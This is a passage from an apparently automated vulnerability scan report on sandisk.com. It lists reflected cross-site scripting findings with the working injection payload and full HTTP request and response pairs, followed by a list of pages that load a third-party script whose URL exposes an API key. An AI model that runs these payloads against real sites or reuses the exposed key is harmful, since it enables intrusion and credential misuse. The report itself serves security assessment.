<a class="ajaxLink" href="http://www.sandisk.com/products/readers-accessories/micromate-sdhc?91afa"style="x:expression(alert(1))"f06b3bb7095=1?tab=review">
...[SNIP]...

1.29. http://www.sandisk.com/products/readers-accessories/sandisk-extreme-20-usb-readers [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/readers-accessories/sandisk-extreme-20-usb-readers

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d213"style%3d"x%3aexpression(alert(1))"733037f334 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9d213"style="x:expression(alert(1))"733037f334 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/readers-accessories/sandisk-extreme-20-usb-readers?9d213"style%3d"x%3aexpression(alert(1))"733037f334=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 25906
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:46:26 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/readers-accessories/sandisk-extreme-20-usb-readers?9d213"style="x:expression(alert(1))"733037f334=1?tab=review">
...[SNIP]...

1.30. http://www.sandisk.com/products/readers-accessories/sandisk-extreme-firewire-reader [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/readers-accessories/sandisk-extreme-firewire-reader

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18e23"style%3d"x%3aexpression(alert(1))"68aef6c3757 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 18e23"style="x:expression(alert(1))"68aef6c3757 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/readers-accessories/sandisk-extreme-firewire-reader?18e23"style%3d"x%3aexpression(alert(1))"68aef6c3757=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 26596
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:46:33 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/readers-accessories/sandisk-extreme-firewire-reader?18e23"style="x:expression(alert(1))"68aef6c3757=1?tab=review">
...[SNIP]...

1.31. http://www.sandisk.com/products/readers-accessories/sandisk-extreme-pro-expresscard-adapter [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/readers-accessories/sandisk-extreme-pro-expresscard-adapter

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29485"style%3d"x%3aexpression(alert(1))"f9fabd04fb7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 29485"style="x:expression(alert(1))"f9fabd04fb7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/readers-accessories/sandisk-extreme-pro-expresscard-adapter?29485"style%3d"x%3aexpression(alert(1))"f9fabd04fb7=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 29365
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:46:16 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/readers-accessories/sandisk-extreme-pro-expresscard-adapter?29485"style="x:expression(alert(1))"f9fabd04fb7=1?tab=review">
...[SNIP]...

1.32. http://www.sandisk.com/products/readers-accessories/sandisk-imagemate-all-in-one-usb-20-reader [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/readers-accessories/sandisk-imagemate-all-in-one-usb-20-reader

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76254"style%3d"x%3aexpression(alert(1))"e871555b17b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 76254"style="x:expression(alert(1))"e871555b17b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/readers-accessories/sandisk-imagemate-all-in-one-usb-20-reader?76254"style%3d"x%3aexpression(alert(1))"e871555b17b=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 32161
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:46:35 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/readers-accessories/sandisk-imagemate-all-in-one-usb-20-reader?76254"style="x:expression(alert(1))"e871555b17b=1?tab=review">
...[SNIP]...

1.33. http://www.sandisk.com/products/readers-accessories/sandisk-imagemate-multi-card-usb-20-reader [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/readers-accessories/sandisk-imagemate-multi-card-usb-20-reader

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c407"style%3d"x%3aexpression(alert(1))"ad0616e8fa4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9c407"style="x:expression(alert(1))"ad0616e8fa4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/readers-accessories/sandisk-imagemate-multi-card-usb-20-reader?9c407"style%3d"x%3aexpression(alert(1))"ad0616e8fa4=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 31282
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:46:28 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/readers-accessories/sandisk-imagemate-multi-card-usb-20-reader?9c407"style="x:expression(alert(1))"ad0616e8fa4=1?tab=review">
...[SNIP]...

1.34. http://www.sandisk.com/products/sansa-music-and-video-players/sandisk-sansa-clipplus-mp3-player [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/sansa-music-and-video-players/sandisk-sansa-clipplus-mp3-player

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b680"style%3d"x%3aexpression(alert(1))"1c3a1238b36 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6b680"style="x:expression(alert(1))"1c3a1238b36 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/sansa-music-and-video-players/sandisk-sansa-clipplus-mp3-player?6b680"style%3d"x%3aexpression(alert(1))"1c3a1238b36=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 53593
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:46:20 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/sansa-music-and-video-players/sandisk-sansa-clipplus-mp3-player?6b680"style="x:expression(alert(1))"1c3a1238b36=1?tab=review">
...[SNIP]...

2. Cross-domain script include previous next
There are 191 instances of this issue:

/
/PlayListXML/
/SanDisk/US-eStore
/SanDisk/facebook
/SanDisk/linkedin
/SanDisk/rss
/SanDisk/twitter
/SanDisk/youtube
/about-sandisk
/about-sandisk.aspx
/about-sandisk/
/about-sandisk/careers
/about-sandisk/careers/
/about-sandisk/careers/benefits
/about-sandisk/careers/career-opportunities
/about-sandisk/careers/employment-practices
/about-sandisk/careers/for-new-college-grads
/about-sandisk/contact-us
/about-sandisk/corporate-social-responsibility
/about-sandisk/corporate-social-responsibility/
/about-sandisk/corporate-social-responsibility/community-engagement
/about-sandisk/corporate-social-responsibility/community-engagement/
/about-sandisk/corporate-social-responsibility/community-engagement/community-education
/about-sandisk/corporate-social-responsibility/community-engagement/community-sharing-program
/about-sandisk/corporate-social-responsibility/community-engagement/employee-volunteering
/about-sandisk/corporate-social-responsibility/community-engagement/philanthropy
/about-sandisk/corporate-social-responsibility/corporate-responsibility
/about-sandisk/corporate-social-responsibility/corporate-responsibility/
/about-sandisk/corporate-social-responsibility/corporate-responsibility/health-and-safety
/about-sandisk/corporate-social-responsibility/corporate-responsibility/labor-and-ethics
/about-sandisk/corporate-social-responsibility/environmental-responsibility
/about-sandisk/corporate-social-responsibility/environmental-responsibility/
/about-sandisk/corporate-social-responsibility/environmental-responsibility/environmental-management-system
/about-sandisk/corporate-social-responsibility/environmental-responsibility/facilities
/about-sandisk/corporate-social-responsibility/environmental-responsibility/information-technology
/about-sandisk/corporate-social-responsibility/product-environmental-compliance
/about-sandisk/corporate-social-responsibility/product-environmental-compliance/chemical-disclosure
/about-sandisk/corporate-social-responsibility/product-environmental-compliance/green-procurement
/about-sandisk/management
/about-sandisk/management/
/about-sandisk/management/timeline-of-innovation
/about-sandisk/media-kit
/about-sandisk/media-kit/
/about-sandisk/media-kit/business-and-industry-association-links
/about-sandisk/media-kit/businessoem-products-brochures
/about-sandisk/media-kit/executive-officer-photos
/about-sandisk/media-kit/executive-officer-photos.aspx
/about-sandisk/media-kit/miscellaneous
/about-sandisk/media-kit/oem-product-photos
/about-sandisk/media-kit/retail-product-photos
/about-sandisk/media-kit/retail-product-photos/
/about-sandisk/media-kit/retail-product-photos/dslr/
/about-sandisk/media-kit/retail-product-photos/dslr/sandisk-extreme-pro-compactflash-card.aspx
/about-sandisk/media-kit/retail-products-brochures
/about-sandisk/media-kit/trademark-information
/about-sandisk/press-room
/about-sandisk/press-room/press-contacts
/about-sandisk/press-room/press-releases
/about-sandisk/press-room/press-releases/2009/2009-09-14-sandisk-extreme-pro-compactflash-memory-card-raises-bar-for-professional-grade-performance,-capacity-and-reliability
/about-sandisk/press-room/press-releases/2010/2010-10-08-sandisk-schedules-third-quarter-2010-conference-call
/about-sandisk/press-room/press-releases/2010/2010-10-21-sandisk-announces-third-quarter-2010-financial-results
/about-sandisk/press-room/press-releases/2010/2010-11-04-sandisk-to-celebrate-15-years-on-the-nasdaq-with--opening-bell-ceremony
/about-sandisk/press-room/press-releases/2010/2010-11-09-sandisk-wins-ces-innovations-2011-design-and-engineering-award-for-world........s-smallest-64gb-solid-state-drive
/about-sandisk/press-room/press-releases/2010/2010-11-09-sandisk-wins-ces-innovations-2011-design-and-engineering-award-for-world..................s-smallest-64gb-solid-state-drive
/about-sandisk/press-room/press-releases/2010/2010-11-09-sandisk-wins-ces-innovations-2011-design-and-engineering-award-for-world......................................s-smallest-64gb-solid-state-drive
/about-sandisk/privacy-policy
/about-sandisk/privacy-policy/
/about-sandisk/privacy-policy/archived-privacypolicy
/about-sandisk/privacy-policy/faq
/about-sandisk/procurement--global-supply-base-management
/about-sandisk/terms-of-use
/about-sandisk/worldwide-locations
/about-sandisk/worldwide-locations/
/about-sandisk/worldwide-locations/sandisk--israel
/about-sandisk/worldwide-locations/sandisk-asia-pacific
/about-sandisk/worldwide-locations/sandisk-europe
/business-solutions
/business-solutions/contact-us
/business-solutions/embedded-products
/business-solutions/embedded-products.aspx
/business-solutions/embedded-products/
/business-solutions/embedded-products/inand
/business-solutions/find-a-distributor
/business-solutions/flash-memory-cards
/business-solutions/flash-memory-cards.aspx
/business-solutions/flash-memory-cards/
/business-solutions/flash-memory-cards/compact-flash-cards
/business-solutions/flash-memory-cards/memory-stick-pro-duo
/business-solutions/flash-memory-cards/sandisk-memory-stick-micro-(m2)-cards-
/business-solutions/flash-memory-cards/sandisk-microsd-and-microsdhc-cards
/business-solutions/mobile-handset-vendors
/business-solutions/mobile-handset-vendors.aspx
/business-solutions/mobile-handset-vendors/
/business-solutions/mobile-handset-vendors/inand
/business-solutions/mobile-handset-vendors/m2
/business-solutions/mobile-handset-vendors/m2.aspx
/business-solutions/mobile-handset-vendors/microsdhc
/business-solutions/mobile-handset-vendors/microsdhc.aspx
/business-solutions/mobile-network-operators
/business-solutions/mobile-network-operators.aspx
/business-solutions/mobile-network-operators/
/business-solutions/mobile-network-operators/memory-cards-
/business-solutions/mobile-network-operators/memory-cards-.aspx
/business-solutions/sd-worm
/business-solutions/sd-worm/
/business-solutions/sd-worm/benefits
/business-solutions/sd-worm/case-studies
/business-solutions/sd-worm/sd-worm-card
/business-solutions/sd-worm/sd-worm-contact-us
/business-solutions/sd-worm/sd-worm-downloads
/business-solutions/sd-worm/solutions
/business-solutions/ssd
/business-solutions/ssd.aspx
/business-solutions/ssd/landing
/business-solutions/technology
/business-solutions/usb-flash-drives
/business-solutions/usb-flash-drives.aspx
/business-solutions/usb-flash-drives/
/business-solutions/usb-flash-drives/clear-case-ufd.aspx
/business-solutions/usb-flash-drives/core-module
/business-solutions/usb-flash-drives/core-module.aspx
/consumer-products
/consumer-products/camcorder
/consumer-products/camera
/consumer-products/computing
/consumer-products/computing/
/consumer-products/computing/ssd-landing
/consumer-products/dslr
/consumer-products/gaming
/consumer-products/mobile-memory
/consumer-products/music-player
/css/MediaPlayer_img/
/flash/
/global-sites
/homepage
/media/100759/
/media/100764/
/media/100769/
/media/100774/
/media/27670/
/media/27675/
/media/27685/
/media/27690/
/media/27695/
/media/407994/
/media/745047/
/misc/404error
/products/camcorder/sandisk-extreme-hd-video-sdhc-cards
/products/camcorder/sandisk-video-hd-sdhc
/products/computing-products/sandisk-cruzer-blade-usb-flash-drive
/products/computing-products/sandisk-solid-state-drive
/products/computing-products/sandisk-ultra-backup-usb-flash-drive
/products/dslr/
/products/dslr/sandisk-extreme-compactflash-card
/products/dslr/sandisk-extreme-iv-compactflash
/products/dslr/sandisk-extreme-pro-compactflash-card
/products/dslr/sandisk-extreme-pro-compactflash-card.aspx
/products/dslr/sandisk-extreme-sdhc-cards-
/products/dslr/sandisk-ultra-compact-flash
/products/dslr/sandisk-ultra-ii-compactflash
/products/dslr/sandisk-ultra-sdhc
/products/dslr/sandisk-ultra-sdxc-cards
/products/gaming-cards/sandisk-gaming-compatibility-pack
/products/gaming-cards/sandisk-memory-stick-micro-m2
/products/gaming-cards/sandisk-xbox-360-usb-flash-drive
/products/imaging/sandisk-extreme-sdhc-cards-
/products/imaging/sandisk-ultra-memory-stick-pro-hg-duo
/products/mobile-memory-products/sandisk-memory-stick-micro-m2
/products/mobile-memory-products/sandisk-memory-stick-micro-m2.aspx
/products/mobile-memory-products/sandisk-microsdhc
/products/mobile-memory-products/sandisk-microsdhc.aspx
/products/mobile-memory-products/sandisk-mobile-ultra-microsd-microsdhc
/products/mobile-memory-products/sandisk-mobilemate-micro-reader.aspx
/products/netbook-cards/sandisk-netbook-sdhc-memory-card
/products/readers-accessories
/products/readers-accessories/large-memory-card-case
/products/readers-accessories/micromate-sdhc
/products/readers-accessories/sandisk-extreme-20-usb-readers
/products/readers-accessories/sandisk-extreme-firewire-reader
/products/readers-accessories/sandisk-extreme-pro-expresscard-adapter
/products/readers-accessories/sandisk-imagemate-all-in-one-usb-20-reader
/products/readers-accessories/sandisk-imagemate-multi-card-usb-20-reader
/products/readers-accessories/sandisk..-mobilemate...-duo
/products/sansa-music-and-video-players/sandisk-sansa-clipplus-mp3-player
/products/slotradioproducts/sansaplayers-cards/card-vh1-classic
/sandisk-rss
/sandisk-rss.aspx
/sandisk-support/contact-us
/sandisk-support/driver-download-wizard
/sandisk-support/where-to-buy
/sitemap

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

2.1. http://www.sandisk.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET / HTTP/1.1
Accept: */*
Referer: http://metricstream.com/html/customers.htm
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sandisk.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmb=1.4.10.1289949765; __utmc=1; __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 28444
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.2. http://www.sandisk.com/PlayListXML/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/PlayListXML/

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /PlayListXML/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:42:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12578

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.3. http://www.sandisk.com/SanDisk/US-eStore previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/SanDisk/US-eStore

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /SanDisk/US-eStore HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:42:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12583

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.4. http://www.sandisk.com/SanDisk/facebook previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/SanDisk/facebook

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /SanDisk/facebook HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:42:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12582

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.5. http://www.sandisk.com/SanDisk/linkedin previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/SanDisk/linkedin

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /SanDisk/linkedin HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:42:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12582

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.6. http://www.sandisk.com/SanDisk/rss previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/SanDisk/rss

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /SanDisk/rss HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
